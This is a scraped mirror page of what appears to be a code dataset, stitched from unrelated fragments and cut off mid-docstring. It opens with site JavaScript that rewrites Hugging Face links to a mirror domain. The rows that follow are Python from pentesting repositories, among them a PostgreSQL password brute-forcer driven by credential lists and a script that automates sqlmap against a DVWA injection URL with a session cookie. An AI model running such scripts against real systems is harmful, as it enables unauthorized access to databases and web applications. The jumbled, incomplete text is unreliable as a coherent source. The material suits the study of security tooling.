{ // 获取包含Hugging Face文本的span元素 const spans = link.querySelectorAll('span.whitespace-nowrap, span.hidden.whitespace-nowrap'); spans.forEach(span => { if (span.textContent && span.textContent.trim().match(/Hugging\s*Face/i)) { span.textContent = 'AI快站'; } }); }); // 替换logo图片的alt属性 document.querySelectorAll('img[alt*="Hugging"], img[alt*="Face"]').forEach(img => { if (img.alt.match(/Hugging\s*Face/i)) { img.alt = 'AI快站 logo'; } }); } // 替换导航栏中的链接 function replaceNavigationLinks() { // 已替换标记,防止重复运行 if (window._navLinksReplaced) { return; } // 已经替换过的链接集合,防止重复替换 const replacedLinks = new Set(); // 只在导航栏区域查找和替换链接 const headerArea = document.querySelector('header') || document.querySelector('nav'); if (!headerArea) { return; } // 在导航区域内查找链接 const navLinks = headerArea.querySelectorAll('a'); navLinks.forEach(link => { // 如果已经替换过,跳过 if (replacedLinks.has(link)) return; const linkText = link.textContent.trim(); const linkHref = link.getAttribute('href') || ''; // 替换Spaces链接 - 仅替换一次 if ( (linkHref.includes('/spaces') || linkHref === '/spaces' || linkText === 'Spaces' || linkText.match(/^s*Spacess*$/i)) && linkText !== 'OCR模型免费转Markdown' && linkText !== 'OCR模型免费转Markdown' ) { link.textContent = 'OCR模型免费转Markdown'; link.href = 'https://fast360.xyz'; link.setAttribute('target', '_blank'); link.setAttribute('rel', 'noopener noreferrer'); replacedLinks.add(link); } // 删除Posts链接 else if ( (linkHref.includes('/posts') || linkHref === '/posts' || linkText === 'Posts' || linkText.match(/^s*Postss*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } // 替换Docs链接 - 仅替换一次 else if ( (linkHref.includes('/docs') || linkHref === '/docs' || linkText === 'Docs' || linkText.match(/^s*Docss*$/i)) && linkText !== '模型下载攻略' ) { link.textContent = '模型下载攻略'; link.href = '/'; replacedLinks.add(link); } // 删除Enterprise链接 else if ( (linkHref.includes('/enterprise') || linkHref === '/enterprise' || linkText === 'Enterprise' || linkText.match(/^s*Enterprises*$/i)) ) { if (link.parentNode) { link.parentNode.removeChild(link); } replacedLinks.add(link); } }); // 查找可能嵌套的Spaces和Posts文本 const textNodes = []; function findTextNodes(element) { if (element.nodeType === Node.TEXT_NODE) { const text = element.textContent.trim(); if (text === 'Spaces' || text === 'Posts' || text === 'Enterprise') { textNodes.push(element); } } else { for (const child of element.childNodes) { findTextNodes(child); } } } // 只在导航区域内查找文本节点 findTextNodes(headerArea); // 替换找到的文本节点 textNodes.forEach(node => { const text = node.textContent.trim(); if (text === 'Spaces') { node.textContent = node.textContent.replace(/Spaces/g, 'OCR模型免费转Markdown'); } else if (text === 'Posts') { // 删除Posts文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } else if (text === 'Enterprise') { // 删除Enterprise文本节点 if (node.parentNode) { node.parentNode.removeChild(node); } } }); // 标记已替换完成 window._navLinksReplaced = true; } // 替换代码区域中的域名 function replaceCodeDomains() { // 特别处理span.hljs-string和span.njs-string元素 document.querySelectorAll('span.hljs-string, span.njs-string, span[class*="hljs-string"], span[class*="njs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换hljs-string类的span中的域名(移除多余的转义符号) document.querySelectorAll('span.hljs-string, span[class*="hljs-string"]').forEach(span => { if (span.textContent && span.textContent.includes('huggingface.co')) { span.textContent = span.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 替换pre和code标签中包含git clone命令的域名 document.querySelectorAll('pre, code').forEach(element => { if (element.textContent && element.textContent.includes('git clone')) { const text = element.innerHTML; if (text.includes('huggingface.co')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 处理特定的命令行示例 document.querySelectorAll('pre, code').forEach(element => { const text = element.innerHTML; if (text.includes('huggingface.co')) { // 针对git clone命令的专门处理 if (text.includes('git clone') || text.includes('GIT_LFS_SKIP_SMUDGE=1')) { element.innerHTML = text.replace(/huggingface.co/g, 'aifasthub.com'); } } }); // 特别处理模型下载页面上的代码片段 document.querySelectorAll('.flex.border-t, .svelte_hydrator, .inline-block').forEach(container => { const content = container.innerHTML; if (content && content.includes('huggingface.co')) { container.innerHTML = content.replace(/huggingface.co/g, 'aifasthub.com'); } }); // 特别处理模型仓库克隆对话框中的代码片段 try { // 查找包含"Clone this model repository"标题的对话框 const cloneDialog = document.querySelector('.svelte_hydration_boundary, [data-target="MainHeader"]'); if (cloneDialog) { // 查找对话框中所有的代码片段和命令示例 const codeElements = cloneDialog.querySelectorAll('pre, code, span'); codeElements.forEach(element => { if (element.textContent && element.textContent.includes('huggingface.co')) { if (element.innerHTML.includes('huggingface.co')) { element.innerHTML = element.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { element.textContent = element.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); } // 更精确地定位克隆命令中的域名 document.querySelectorAll('[data-target]').forEach(container => { const codeBlocks = container.querySelectorAll('pre, code, span.hljs-string'); codeBlocks.forEach(block => { if (block.textContent && block.textContent.includes('huggingface.co')) { if (block.innerHTML.includes('huggingface.co')) { block.innerHTML = block.innerHTML.replace(/huggingface.co/g, 'aifasthub.com'); } else { block.textContent = block.textContent.replace(/huggingface.co/g, 'aifasthub.com'); } } }); }); } catch (e) { // 错误处理但不打印日志 } } // 当DOM加载完成后执行替换 if (document.readyState === 'loading') { document.addEventListener('DOMContentLoaded', () => { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); }); } else { replaceHeaderBranding(); replaceNavigationLinks(); replaceCodeDomains(); // 只在必要时执行替换 - 3秒后再次检查 setTimeout(() => { if (!window._navLinksReplaced) { console.log('[Client] 3秒后重新检查导航链接'); replaceNavigationLinks(); } }, 3000); } // 增加一个MutationObserver来处理可能的动态元素加载 const observer = new MutationObserver(mutations => { // 检查是否导航区域有变化 const hasNavChanges = mutations.some(mutation => { // 检查是否存在header或nav元素变化 return Array.from(mutation.addedNodes).some(node => { if (node.nodeType === Node.ELEMENT_NODE) { // 检查是否是导航元素或其子元素 if (node.tagName === 'HEADER' || node.tagName === 'NAV' || node.querySelector('header, nav')) { return true; } // 检查是否在导航元素内部 let parent = node.parentElement; while (parent) { if (parent.tagName === 'HEADER' || parent.tagName === 'NAV') { return true; } parent = parent.parentElement; } } return false; }); }); // 只在导航区域有变化时执行替换 if (hasNavChanges) { // 重置替换状态,允许再次替换 window._navLinksReplaced = false; replaceHeaderBranding(); replaceNavigationLinks(); } }); // 开始观察document.body的变化,包括子节点 if (document.body) { observer.observe(document.body, { childList: true, subtree: true }); } else { document.addEventListener('DOMContentLoaded', () => { observer.observe(document.body, { childList: true, subtree: true }); }); } })(); ')\n\nprint parse.prettify()\n\n\n \n \n Title of the page\n \n \n \n

\n This is a paragraph\n \n one\n \n \n Example Link 1\n \n

\n

\n This is a paragraph\n \n two\n \n \n Example Link 2\n \n

\n \n\n\n"},"avg_line_length":{"kind":"number","value":19.52777777777778,"string":"19.527778"},"max_line_length":{"kind":"number","value":302,"string":"302"},"alphnanum_fraction":{"kind":"number","value":0.5962059620596206,"string":"0.596206"}}},{"rowIdx":149,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import time, dpkt\r\nimport plotly.plotly as py\r\nfrom plotly.graph_objs import *\r\nfrom datetime import datetime\r\n\r\nfilename = 'hbot.pcap'\r\n\r\nfull_datetime_list = []\r\ndates = []\r\n\r\nfor ts, pkt in dpkt.pcap.Reader(open(filename,'rb')):\r\n eth=dpkt.ethernet.Ethernet(pkt) \r\n if eth.type!=dpkt.ethernet.ETH_TYPE_IP:\r\n continue\r\n\r\n ip = eth.data\r\n tcp=ip.data\r\n \r\n if ip.p not in (dpkt.ip.IP_PROTO_TCP, dpkt.ip.IP_PROTO_UDP):\r\n continue\r\n\r\n if tcp.dport == 21 or tcp.sport == 21:\r\n full_datetime_list.append((ts, str(time.ctime(ts))))\r\n \r\n\r\nfor t,d in full_datetime_list:\r\n if d not in dates:\r\n dates.append(d)\r\n \r\ndates.sort(key=lambda date: datetime.strptime(date, \"%a %b %d %H:%M:%S %Y\"))\r\n\r\ndatecount = []\r\n\r\nfor d in dates:\r\n counter = 0\r\n for d1 in full_datetime_list:\r\n if d1[1] == d:\r\n counter += 1\r\n\r\n datecount.append(counter)\r\n\r\n\r\ndata = Data([\r\n Scatter(\r\n x=dates,\r\n y=datecount\r\n )\r\n])\r\nplot_url = py.plot(data, filename='FTP Requests')\r\n"},"avg_line_length":{"kind":"number","value":19.94,"string":"19.94"},"max_line_length":{"kind":"number","value":77,"string":"77"},"alphnanum_fraction":{"kind":"number","value":0.5803059273422562,"string":"0.580306"}}},{"rowIdx":150,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"import shelve\ndef create():\n\tshelf = shelve.open(\"mohit.raj\", writeback=True)\n\tshelf['desc'] ={}\n\tshelf.close()\n\tprint \"Dictionary is created\"\n\n\ndef update():\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n port =int(raw_input(\"Enter the Port: \"))\n data[port]= raw_input(\"\\n Enter the description\\t\")\n shelf.close()\n \ndef del1():\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n port =int(raw_input(\"Enter the Port: \"))\n del data[port]\n shelf.close()\n print \"\\nEntry is deleted\"\n \n\ndef list1():\n print \"*\"*30\n shelf = shelve.open(\"mohit.raj\", writeback=True)\n data=(shelf['desc'])\n for key, value in data.items():\n print key, \":\", value\n print \"*\"*30\nprint \"\\t Program to update or Add and Delete the port number detail\\n\"\nwhile(True):\n\tprint \"Press\" \n\tprint \"C for create only one time create\"\n\tprint \"U for Update or Add \\nD for delete\"\n\tprint \"L for list the all values \"\n\tprint \"E for Exit \"\n\tc=raw_input(\"Enter : \") \n\n\tif (c=='C' or c=='c'):\n\t\tcreate()\n\n\telif (c=='U' or c=='u'):\n\t\tupdate()\n\n\telif(c=='D' or c=='d'):\n\t\tdel1()\n\n\telif(c=='L' or c=='l'):\n\t\tlist1()\n\t\t\n\telif(c=='E' or c=='e'):\n\t\texit()\n\n\telse:\n\t\tprint \"\\t Wrong Input\"\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":19.274193548387096,"string":"19.274194"},"max_line_length":{"kind":"number","value":71,"string":"71"},"alphnanum_fraction":{"kind":"number","value":0.5923566878980892,"string":"0.592357"}}},{"rowIdx":151,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nACTIVE Plugin for Unauthenticated Nikto testing\nThis will perform a \"low-hanging-fruit\" pass on the web app for easy to find (tool-findable) vulns\n\"\"\"\nfrom owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Active Vulnerability Scanning without credentials via nikto\"\n\n\ndef run(PluginInfo):\n NiktoOutput = plugin_helper.CommandDump(\n \"Test Command\", \"Output\", get_resources(\"Nikto_Unauth\"), PluginInfo, []\n )\n Content = plugin_helper.CommandDump(\n \"Test Command\",\n \"Output\",\n get_resources(\"Nikto_Verify_Unauth\"),\n PluginInfo,\n NiktoOutput,\n )\n return Content + NiktoOutput # Show Nikto Verify FIRST (more useful, with links to findings, etc)\n"},"avg_line_length":{"kind":"number","value":32.04347826086956,"string":"32.043478"},"max_line_length":{"kind":"number","value":102,"string":"102"},"alphnanum_fraction":{"kind":"number","value":0.7048748353096179,"string":"0.704875"}}},{"rowIdx":152,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"import requests\nimport json\nimport time\nimport pprint\n\nclass SqliAutomate():\n\n def __init__(self,url,other_params={}):\n self.url=url\n self.other=other_params \n \n def start_polling(self,task_id):\n try:\n time.sleep(30)\n poll_resp=requests.get(\"http://127.0.0.1:8775/scan/\"+task_id+\"/log\")\n pp = pprint.PrettyPrinter(indent=4)\n #print(poll_resp.json())\n pp.pprint(poll_resp.json())\n except Exception as ex:\n print(\"Exception caught : \" +str(ex))\n\n def start(self):\n try: \n task_resp=requests.get(\"http://127.0.0.1:8775/task/new\")\n data=task_resp.json()\n if data.get(\"success\",\"\") ==True:\n task_id=data.get(\"taskid\")\n print(\"Task id : \"+str(task_id))\n data_={'url':self.url}\n data_.update(self.other)\n opt_resp=requests.post(\"http://127.0.0.1:8775/option/\"+task_id+\"/set\",json=data_)\n if opt_resp.json().get(\"success\")==True:\n start_resp=requests.post(\"http://127.0.0.1:8775/scan/\"+task_id+\"/start\",json=data_)\n if start_resp.json().get(\"success\")==True:\n print(\"Scan Started successfully .Now polling\\n\")\n self.start_polling(task_id)\n except Exception as ex:\n print(\"Exception : \"+str(ex))\n\nother={'cookie':'PHPSESSID=7brq7o2qf68hk94tan3f14atg4;security=low'}\nobj=SqliAutomate('http://192.168.250.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit',other)\nobj.start()\n"},"avg_line_length":{"kind":"number","value":36.44186046511628,"string":"36.44186"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphnanum_fraction":{"kind":"number","value":0.5475450590428838,"string":"0.547545"}}},{"rowIdx":153,"cells":{"repo_name":{"kind":"string","value":"PenetrationTestingScripts"},"text":{"kind":"string","value":"#coding=utf-8\nimport time\nimport threading\nfrom printers import printPink,printGreen\nfrom multiprocessing.dummy import Pool\nimport psycopg2\nimport re\n\n\ndef postgres_connect(ip,username,password,port):\n crack =0\n try:\n db=psycopg2.connect(user=username, password=password, host=ip, port=port)\n if db:\n crack=1\n db.close()\n except Exception, e:\n if re.findall(\".*Password.*\",e[0]):\n lock.acquire()\n print \"%s postgres's %s:%s login fail\" %(ip,username,password)\n lock.release()\n crack=2\n else:\n lock.acquire()\n print \"connect %s postgres service at %s login fail \" %(ip,port)\n lock.release()\n crack=3\n pass\n return crack\n\ndef postgreS(ip,port):\n try:\n d=open('conf/postgres.conf','r')\n data=d.readline().strip('\\r\\n')\n while(data):\n username=data.split(':')[0]\n password=data.split(':')[1]\n flag=postgres_connect(ip,username,password,port)\n time.sleep(0.1)\n if flag==3:\n break\n\n if flag==1:\n lock.acquire()\n printGreen(\"%s postgres at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n result.append(\"%s postgres at %s has weaken password!!-------%s:%s\\r\\n\" %(ip,port,username,password))\n lock.release()\n break\n data=d.readline().strip('\\r\\n')\n except Exception,e:\n print e\n pass\n\ndef postgres_main(ipdict,threads):\n printPink(\"crack postgres now...\")\n print \"[*] start postgres %s\" % time.ctime()\n starttime=time.time()\n\n global lock\n lock = threading.Lock()\n global result\n result=[]\n\n pool=Pool(threads)\n\n for ip in ipdict['postgres']:\n pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))\n\n pool.close()\n pool.join()\n print \"[*] stop crack postgres %s\" % time.ctime()\n print \"[*] crack postgres done,it has Elapsed time:%s \" % (time.time()-starttime)\n return result"},"avg_line_length":{"kind":"number","value":29.356164383561644,"string":"29.356164"},"max_line_length":{"kind":"number","value":121,"string":"121"},"alphnanum_fraction":{"kind":"number","value":0.5367945823927766,"string":"0.536795"}}},{"rowIdx":154,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\ntests.suite.categories\n~~~~~~~~~~~~~~~~~~~~~~\n\nTest categories.\n\"\"\"\nfrom tests.functional.cli.test_empty_run import OWTFCliEmptyRunTest\nfrom tests.functional.cli.test_list_plugins import OWTFCliListPluginsTest\nfrom tests.functional.cli.test_nowebui import OWTFCliNoWebUITest\nfrom tests.functional.cli.test_scope import OWTFCliScopeTest\nfrom tests.functional.cli.test_except import OWTFCliExceptTest\nfrom tests.functional.cli.test_only import OWTFCliOnlyPluginsTest\nfrom tests.functional.plugins.web.test_web import OWTFCliWebPluginTest\nfrom tests.functional.plugins.web.active.test_web_active import OWTFCliWebActivePluginTest\n\nSUITES = [\n OWTFCliEmptyRunTest,\n OWTFCliListPluginsTest,\n OWTFCliNoWebUITest,\n OWTFCliScopeTest,\n OWTFCliExceptTest,\n OWTFCliOnlyPluginsTest,\n OWTFCliWebPluginTest,\n OWTFCliWebActivePluginTest,\n]\n"},"avg_line_length":{"kind":"number","value":31.846153846153847,"string":"31.846154"},"max_line_length":{"kind":"number","value":90,"string":"90"},"alphnanum_fraction":{"kind":"number","value":0.8077373974208675,"string":"0.807737"}}},{"rowIdx":155,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\ntests.utils\n~~~~~~~~~~~\n\nMiscellaneous functions for test cases\n\"\"\"\nimport os\nimport shutil\nimport subprocess\n\nDIR_OWTF_REVIEW = \"owtf_review\"\nDIR_OWTF_LOGS = \"logs\"\n\n\ndef db_setup(cmd):\n \"\"\"Reset OWTF database.\"\"\"\n if cmd not in [\"clean\", \"init\"]:\n return\n formatted_cmd = \"make db-{}\".format(cmd)\n pwd = os.getcwd()\n db_process = subprocess.Popen(\n \"/usr/bin/echo '\\n' | %s %s\" % (os.path.join(pwd), formatted_cmd),\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n db_process.wait()\n\n\ndef clean_owtf_review():\n \"\"\"Remove OWTF owtf_review output directory.\"\"\"\n pwd = os.getcwd()\n shutil.rmtree(os.path.join(pwd, DIR_OWTF_REVIEW), ignore_errors=True)\n\n\ndef load_log(\n name,\n dir_owtf_review=DIR_OWTF_REVIEW,\n dir_owtf_logs=DIR_OWTF_LOGS,\n absolute_path=False,\n):\n \"\"\"Read the file 'name' and returns its content.\"\"\"\n if not name.endswith(\".log\"):\n name += \".log\"\n if not absolute_path:\n fullpath = os.path.join(os.getcwd(),\n \tdir_owtf_review,\n \tdir_owtf_logs,\n \tname\n )\n else:\n fullpath = name\n with open(fullpath, \"r\") as f:\n return f.readlines()\n"},"avg_line_length":{"kind":"number","value":21.163636363636364,"string":"21.163636"},"max_line_length":{"kind":"number","value":74,"string":"74"},"alphnanum_fraction":{"kind":"number","value":0.5886699507389163,"string":"0.58867"}}},{"rowIdx":156,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"#!/usr/bin/python3.5\nclass ASP_Parent():\n\tdef __init__(self,pub,prot,priv):\n\t\tself.public=pub\n\t\tself._protected=prot\n\t\tself.__private=priv\nclass ASP_child(ASP_Parent):\n\tdef __init(self,pub,prot,priv):\n\t\tsuper().__init__(pub,prot,priv)\n\tdef printMembers(self):\n\t\ttry:\n\t\t\tprint(\"Public is :\" + str(self.public))\n\t\t\tprint(\"Protected is : \" + str(self._protected))\n\t\t\tprint(\"Private is : \" + str(self.__private))\n\t\texcept Exception as ex:\n\t\t\tprint(\"Ex: \" +str(ex))\n\t\t\t#pr=ASP_Parent()\n\t\t\tprint(\"Private is : \" +str(self._ASP_Parent__private))\n\nch=ASP_child(1,2,3)\nch.printMembers()\nprint(\"Public outside :\"+str(ch.public))\nprint(\"Protceted outside :\"+str(ch._protected))\t\t\t\nprint(\"Private outside :\"+str(ch._ASP_Parent__private))\t\t\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":24.275862068965516,"string":"24.275862"},"max_line_length":{"kind":"number","value":57,"string":"57"},"alphnanum_fraction":{"kind":"number","value":0.6516393442622951,"string":"0.651639"}}},{"rowIdx":157,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"#!/usr/bin/env python\n\nimport ctypes\nimport os\nfrom os.path import join\nimport sys\n\n# load shared library\nlibcap2 = ctypes.cdll.LoadLibrary('libcap.so.2')\n\nclass cap2_smart_char_p(ctypes.c_char_p):\n \"\"\"Implements a smart pointer to a string allocated\n by libcap2.so.2\"\"\"\n def __del__(self):\n libcap2.cap_free(self)\n\n# note to ctypes: cap_to_text() returns a pointer\n# that needs automatic deallocation\nlibcap2.cap_to_text.restype = cap2_smart_char_p\n\ndef caps_from_file(filename):\n \"\"\"Returns the capabilities of the given file as text\"\"\"\n\n cap_t = libcap2.cap_get_file(filename)\n if cap_t == 0:\n return ''\n return libcap2.cap_to_text(cap_t, None).value\n\n\ndef get_caps_list(basepath):\n \"\"\"Collects file capabilities of a directory tree.\n\n Arguments:\n basepath -- directory to start from\"\"\"\n\n result = {}\n for root, dirs, files in os.walk(basepath):\n for f in files:\n fullname = join(root, f)\n caps = caps_from_file(fullname)\n if caps != '':\n result[fullname] = caps\n\n return result\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print 'Usage %s root_directory' % sys.argv[0]\n sys.exit(1)\n\n capabilities = get_caps_list(sys.argv[1])\n\n for filename, caps in capabilities.iteritems():\n print \"%s: %s\" % (filename, caps)\n"},"avg_line_length":{"kind":"number","value":23.8,"string":"23.8"},"max_line_length":{"kind":"number","value":60,"string":"60"},"alphnanum_fraction":{"kind":"number","value":0.6243580337490829,"string":"0.624358"}}},{"rowIdx":158,"cells":{"repo_name":{"kind":"string","value":"cybersecurity-penetration-testing"},"text":{"kind":"string","value":"# Importing required modules\nimport requests \nfrom bs4 import BeautifulSoup \nimport urlparse\n\nresponse = requests.get('http://www.freeimages.co.uk/galleries/food/breakfast/index.htm') \nparse = BeautifulSoup(response.text)\n\n# Get all image tags\nimage_tags = parse.find_all('img')\n\n# Get urls to the images\nimages = [ url.get('src') for url in image_tags]\n\n# If no images found in the page\nif not images: \n sys.exit(\"Found No Images\")\n\n# Convert relative urls to absolute urls if any\nimages = [urlparse.urljoin(response.url, url) for url in images] \nprint 'Found %s images' % len(images)\n\n\n# Download images to downloaded folder\nfor url in images: \n r = requests.get(url)\n f = open('downloaded/%s' % url.split('/')[-1], 'w')\n f.write(r.content)\n f.close()\n print 'Downloaded %s' % url\n\n"},"avg_line_length":{"kind":"number","value":24.28125,"string":"24.28125"},"max_line_length":{"kind":"number","value":91,"string":"91"},"alphnanum_fraction":{"kind":"number","value":0.6943069306930693,"string":"0.694307"}}},{"rowIdx":159,"cells":{"repo_name":{"kind":"string","value":"Hands-On-Penetration-Testing-with-Python"},"text":{"kind":"string","value":"#! /usr/bin/python3.5\nimport xml.etree.ElementTree as ET\nimport sys\nclass XML_parser():\n\tdef __init__(self,xml):\n\t\tself.xml=xml\n\t\t\n\tdef parse(self,parse_type=\"doc\"):\n\t\t#root=ET.fromstring(country_data_as_string)\n\t\tif parse_type ==\"doc\":\n\t\t\troot = ET.parse(self.xml).getroot()\n\t\telse:\n\t\t\troot=ET.fromstring(self.xml)\n\t\ttag = root.tag\n\t\tprint(\"Root tag is :\"+str(tag))\n\t\tattributes = root.attrib\n\t\tprint(\"Root attributes are :\")\n\t\tfor k,v in attributes.items():\n\t\t\tprint(\"\\t\"+str(k) +\" : \"+str(v))\n\t\tprint(\"\\nPrinting Node Details without knowing subtags :\")\n\t\tfor employee in root: #.findall(tag)\n\t\t\t# access all elements in node\n\t\t\tprint(\"\\n-----------------------------\")\n\t\t\tfor element in employee:\n\t\t\t\tele_name = element.tag\n\t\t\t\tele_value = employee.find(element.tag).text\n\t\t\t\tprint(\"\\t\\t\"+ele_name, ' : ', ele_value)\n\n\t\tprint(\"\\n\\nPrinting Node Details specifying subtags :\")\n\t\tfor employee in root.findall(\"employee\"):\n\t\t\tprint(\"\\n-----------------------------\")\n\t\t\tprint(\"\\t\\tName :\" +str(employee.find(\"name\").text))\n\t\t\tprint(\"\\t\\tSalary :\" +str(employee.find(\"salary\").text))\n\t\t\tprint(\"\\t\\tAge :\" +str(employee.find(\"age\").text))\n\t\t\tprint(\"\\t\\tManager Id :\" +str(employee.find(\"manager_id\").text))\n\t\t\tprint(\"\\t\\tDOJ :\" +str(employee.find(\"doj\").text))\t\t\nobj=XML_parser(sys.argv[1])\nobj.parse()\n\nxml=\"\"\"\n \n Emp1\n\t32\n\t30000\n\t06/06/2016\n\t33\n \n \n Emp2\n\t28\n\t27000\n\t18/02/2017\n\t33\n \n\"\"\"\n#obj=XML_parser(xml)\n#obj.parse(\"string\")\n\n"},"avg_line_length":{"kind":"number","value":28.271186440677965,"string":"28.271186"},"max_line_length":{"kind":"number","value":67,"string":"67"},"alphnanum_fraction":{"kind":"number","value":0.6152954808806489,"string":"0.615295"}}},{"rowIdx":160,"cells":{"repo_name":{"kind":"string","value":"owtf"},"text":{"kind":"string","value":"\"\"\"\nowtf.api.handlers.plugin\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n\"\"\"\nimport collections\n\nfrom owtf.api.handlers.base import APIRequestHandler\nfrom owtf.constants import MAPPINGS\nfrom owtf.lib import exceptions\nfrom owtf.lib.exceptions import APIError\nfrom owtf.managers.plugin import get_all_plugin_dicts, get_types_for_plugin_group\nfrom owtf.managers.poutput import delete_all_poutput, get_all_poutputs, update_poutput\nfrom owtf.models.test_group import TestGroup\nfrom owtf.api.handlers.jwtauth import jwtauth\n\n__all__ = [\"PluginNameOutput\", \"PluginDataHandler\", \"PluginOutputHandler\"]\n\n\n@jwtauth\nclass PluginDataHandler(APIRequestHandler):\n \"\"\"Get completed plugin output data from the DB.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\"]\n\n # TODO: Creation of user plugins\n def get(self, plugin_group=None, plugin_type=None, plugin_code=None):\n \"\"\"Get plugin data based on user filter data.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/plugins/?group=web&group=network HTTP/1.1\n Accept: application/json, text/javascript, */*\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Encoding: gzip\n Vary: Accept-Encoding\n Content-Type: application/json\n\n {\n \"status\": \"success\",\n \"data\": [\n {\n \"file\": \"Old_Backup_and_Unreferenced_Files@OWTF-CM-006.py\",\n \"code\": \"OWTF-CM-006\",\n \"group\": \"web\",\n \"attr\": null,\n \"title\": \"Old Backup And Unreferenced Files\",\n \"key\": \"external@OWTF-CM-006\",\n \"descrip\": \"Plugin to assist manual testing\",\n \"min_time\": null,\n \"type\": \"external\",\n \"name\": \"Old_Backup_and_Unreferenced_Files\"\n },\n {\n \"file\": \"Old_Backup_and_Unreferenced_Files@OWTF-CM-006.py\",\n \"code\": \"OWTF-CM-006\",\n \"group\": \"web\",\n \"attr\": null,\n \"title\": \"Old Backup And Unreferenced Files\",\n \"key\": \"passive@OWTF-CM-006\",\n \"descrip\": \"Google Hacking for juicy files\",\n \"min_time\": null,\n \"type\": \"passive\",\n \"name\": \"Old_Backup_and_Unreferenced_Files\"\n }\n ]\n }\n \"\"\"\n try:\n filter_data = dict(self.request.arguments)\n if not plugin_group: # Check if plugin_group is present in url\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and (not plugin_type) and (not plugin_code):\n filter_data.update({\"group\": plugin_group})\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and plugin_type and (not plugin_code):\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"type\": plugin_type, \"group\": plugin_group})\n self.success(get_all_plugin_dicts(self.session, filter_data))\n if plugin_group and plugin_type and plugin_code:\n if plugin_type not in get_types_for_plugin_group(self.session, plugin_group):\n raise APIError(422, \"Plugin type not found in selected plugin group\")\n filter_data.update({\"type\": plugin_type, \"group\": plugin_group, \"code\": plugin_code})\n # This combination will be unique, so have to return a dict\n results = get_all_plugin_dicts(self.session, filter_data)\n if results:\n self.success(results[0])\n else:\n raise APIError(500, \"Cannot get any plugin dict\")\n except exceptions.InvalidTargetReference:\n raise APIError(400, \"Invalid target provided.\")\n\n\n@jwtauth\nclass PluginNameOutput(APIRequestHandler):\n \"\"\"Get the scan results for a target.\"\"\"\n\n SUPPORTED_METHODS = [\"GET\"]\n\n def get(self, target_id=None):\n \"\"\"Retrieve scan results for a target.\n\n **Example request**:\n\n .. sourcecode:: http\n\n GET /api/v1/targets/2/poutput/names/ HTTP/1.1\n Accept: */*\n Accept-Encoding: gzip, deflate\n X-Requested-With: XMLHttpRequest\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 OK\n Content-Encoding: gzip\n Content-Type: application/json; charset=UTF-8\n\n {\n \"status\": \"success\",\n \"data\": {\n \"OWTF-AT-004\": {\n \"data\": [\n {\n \"status\": \"Successful\",\n \"owtf_rank\": -1,\n \"plugin_group\": \"web\",\n \"start_time\": \"01/04/2018-14:05\",\n \"target_id\": 2,\n \"run_time\": \"0s, 1ms\",\n \"user_rank\": -1,\n \"plugin_key\": \"external@OWTF-AT-004\",\n \"id\": 5,\n \"plugin_code\": \"OWTF-AT-004\",\n \"user_notes\": null,\n \"output_path\": null,\n \"end_time\": \"01/04/2018-14:05\",\n \"error\": null,\n \"plugin_type\": \"external\"\n }\n ],\n \"details\": {\n \"priority\": 99,\n \"code\": \"OWTF-AT-004\",\n \"group\": \"web\",\n \"mappings\": {\n \"OWASP_V3\": [\n \"OWASP-AT-004\",\n \"Brute Force Testing\"\n ],\n \"OWASP_V4\": [\n \"OTG-AUTHN-003\",\n \"Testing for Weak lock out mechanism\"\n ],\n \"CWE\": [\n \"CWE-16\",\n \"Configuration - Brute force\"\n ],\n \"NIST\": [\n \"IA-6\",\n \"Authenticator Feedback - Brute force\"\n ],\n \"OWASP_TOP_10\": [\n \"A5\",\n \"Security Misconfiguration - Brute force\"\n ]\n },\n \"hint\": \"Brute Force\",\n \"url\": 